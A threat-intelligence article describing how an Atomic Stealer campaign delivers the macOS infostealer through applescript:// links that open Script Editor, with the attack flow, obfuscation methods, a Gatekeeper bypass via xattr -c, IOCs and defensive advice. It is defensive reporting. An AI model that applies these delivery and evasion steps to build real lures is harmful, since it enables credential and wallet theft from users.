Atomic Stealer Pivots to Script Editor After Apple Blocks Terminal

Apple's macOS 26.4 update added paste scanning to Terminal, specifically to disrupt ClickFix-style attacks that trick users into copying and executing malicious commands. Attackers adapted within weeks. Jamf Threat Labs documented a new campaign that delivers Atomic Stealer through Script Editor instead—completely bypassing Terminal's new protections.

The evolution demonstrates how quickly threat actors iterate on delivery mechanisms when defenses improve. The payload remains the same; only the execution path changed.

How the Attack Works

Traditional ClickFix attacks on macOS presented users with fake error messages instructing them to copy a command and paste it into Terminal. Apple recognized this pattern and added scanning that warns users before potentially dangerous pasted commands execute.

The new campaign sidesteps Terminal entirely using the applescript:// URL scheme:

applescript://com.apple.scripteditor?action=new&script=[encoded payload]

When a user clicks a link containing this URL, their browser prompts them to allow Script Editor to open. If they approve, Script Editor launches with a pre-populated script ready to execute. No Terminal involvement, no paste scanning.

The attack flow:

1. User visits a fake Apple-themed page claiming to offer disk cleanup
2. Clicking "Execute" triggers the applescript:// URL
3. Browser asks permission to open Script Editor
4. Script Editor opens with obfuscated code already loaded
5. macOS 26.4+ shows an "unidentified developer" warning
6. User runs the script anyway
7. Script downloads and executes Atomic Stealer

The Payload: Atomic Stealer (AMOS)

Atomic Stealer remains one of the most capable macOS infostealers. The malware targets:

• Keychain credentials and passwords
• Browser cookies, autofill data, and stored credit cards
• Cryptocurrency wallet extensions
• Desktop files and documents
• System information for fingerprinting

This campaign delivers the same Atomic Stealer binary we've tracked in previous campaigns. The attackers didn't need to modify their malware—they only changed how they get victims to execute it.

The connection to broader infostealer trends is clear. Microsoft recently warned about infostealers expanding beyond Windows to target macOS and using cross-platform delivery techniques. ClickFix has been particularly effective because it exploits user behavior rather than software vulnerabilities.

Technical Obfuscation

The Script Editor payload uses multiple layers of encoding to evade detection:

• String transformation - Uses the tr utility to convert obfuscated strings into valid URLs at runtime
• Base64 + gzip compression - Conceals second-stage shell commands before execution
• Inline execution - Downloaded payloads pipe directly to zsh without touching disk

The script masquerades as a "macOS Storage Optimization" utility, claiming it will remove caches, logs, and other clutter. Users who run it expecting system cleanup instead get their credentials stolen.

Once executed, the script:

1. Downloads a binary to /tmp/helper
2. Strips extended attributes with xattr -c to bypass Gatekeeper
3. Grants execution permissions
4. Runs the Atomic Stealer payload

Indicators of Compromise

Type	Indicator
Domain	dryvecar[.]com
URL	storage-fixes.squarespace[.]com
URL	cleanupmac.mssg[.]me
SHA256	3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44

The Squarespace and mssg.me hosting is notable—attackers frequently abuse legitimate platforms for initial delivery before redirecting to infrastructure they control.

Why Script Editor?

The shift to Script Editor makes sense from an attacker's perspective:

• Bypasses Terminal protections - Apple's paste scanning doesn't apply
• Lower friction - Users may trust Script Editor more than Terminal
• Pre-populated execution - No manual pasting required
• Same social engineering - The fake webpage approach still works

This is tactical evolution, not strategic change. The underlying ClickFix technique—using fake technical problems to convince users to execute attacker-controlled code—remains effective. Apple blocked one execution path, so attackers found another.

Protection Recommendations

For individual Mac users:

• Never run scripts from websites - Legitimate disk cleanup doesn't require pasting code
• Distrust browser prompts to open applications - Especially Script Editor or Terminal
• Keep macOS updated - The 26.4 warnings provide some protection
• Use reputable security tools - EDR solutions can detect Atomic Stealer behavior

For organizations managing Mac fleets:

• Block applescript:// URL handling - MDM policies can prevent this attack vector
• Monitor Script Editor execution - Unusual Script Editor activity from browser contexts is suspicious
• Deploy endpoint detection - Look for the known IOCs and behavioral patterns
• Train users on ClickFix tactics - Recognition prevents execution

The Bigger Picture

ClickFix attacks have proven remarkably resilient. We've covered variants targeting Chrome extensions and enterprise browser crashes. Each time defenders block a technique, attackers adapt.

The lesson isn't that defenses are futile—Apple's Terminal protection forced attackers to find an alternative, which creates new detection opportunities. But single-point defenses won't stop determined operators. Effective protection requires layered controls: user education, endpoint detection, network monitoring, and application restrictions working together.

Script Editor isn't the last alternative. If Apple hardens applescript:// URL handling, attackers will find another path. The cat-and-mouse continues.